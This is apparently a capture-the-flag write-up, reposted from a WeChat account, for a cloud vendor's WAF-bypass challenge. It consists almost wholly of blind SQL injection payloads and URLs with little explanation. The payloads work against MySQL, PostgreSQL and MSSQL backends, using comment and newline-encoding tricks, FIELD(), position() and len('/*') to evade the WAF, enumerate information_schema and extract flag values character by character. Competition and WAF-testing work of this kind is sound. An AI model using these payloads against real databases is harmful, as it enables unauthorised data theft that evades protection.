type=mysql&id=’=”/*”=FIELD(if(substr((/*/*/SelEct+table_name+from{a+%0dinformation_schema%23%0a.%0atables}+where+table_schema=’test’+limit+0,1),1,1)=’b’,1,3),1,3)%23
FIELD(if(1=1,1,3)1,3)
select a from {a+%0dinformation_schema%23%0a.%0acolumns}
"=feld(if(substr((/*/
http://sqli.aliyundemo.com/query?type=mysql&id=’=”/*”=FIELD(if(substr((/*/*/SelEct+table_name+from{a+%0dinformation_schema%23%0a.%0atables}+where+table_schema=’test’+limit+0,1),1,1)=’b’,1,3),1,3)%23
http://sqli.aliyundemo.com/query?type=mysql&id=’=”/*”=FIELD(if(substr((/*/*/SelEct+column_name+from{a+%0dinformation_schema%23%0a.%0acolumns}+where+table_schema=’test’+and+table_name=’boy’+limit+4,1),1,1)=’b’,1,3),1,3)%23
http://sqli.aliyundemo.com/query?type=mysql&id=’=”/*”=FIELD(if(substr((/*/*/SelEct+flag+from{a+flag_a4f69eb5719562771ece9729f6a58983}+limit+0,1),1,1)=’2′,1,3),1,3)%23
http://sqli.aliyundemo.com/query?type=psql&id=/*’or+’0′!=position(substr((/*a*/SELECT+flag+from+flag_9740453557b698bee491c3fd9f2f3c69),2,1)+in+’0′)+–+
'0'!=position(substr('abc',1,1) in 'a')
&id=/*'or+'0'!=position(substr((/*a*/select/*'or+'0'!=position(substr((/*a*/被注释
http://sqli.aliyundemo.com/query?type=psql&id=/*’or+’0′!=position(substr((/*a*/select+flag+from+flag_9740453557b698bee491c3fd9f2f3c69),1,1)+in+’0′)+–+
123'AND 1=len('/*')/(seleCT -- */name from master..sysdatabases for xml path) --
22329-len('/*')/@2-len('/*')/(case when substring(db_name(),1,1)='x' then 0 else 1 end)
原文始发于微信公众号(XG小刚):阿某云-WAF挑战赛wp
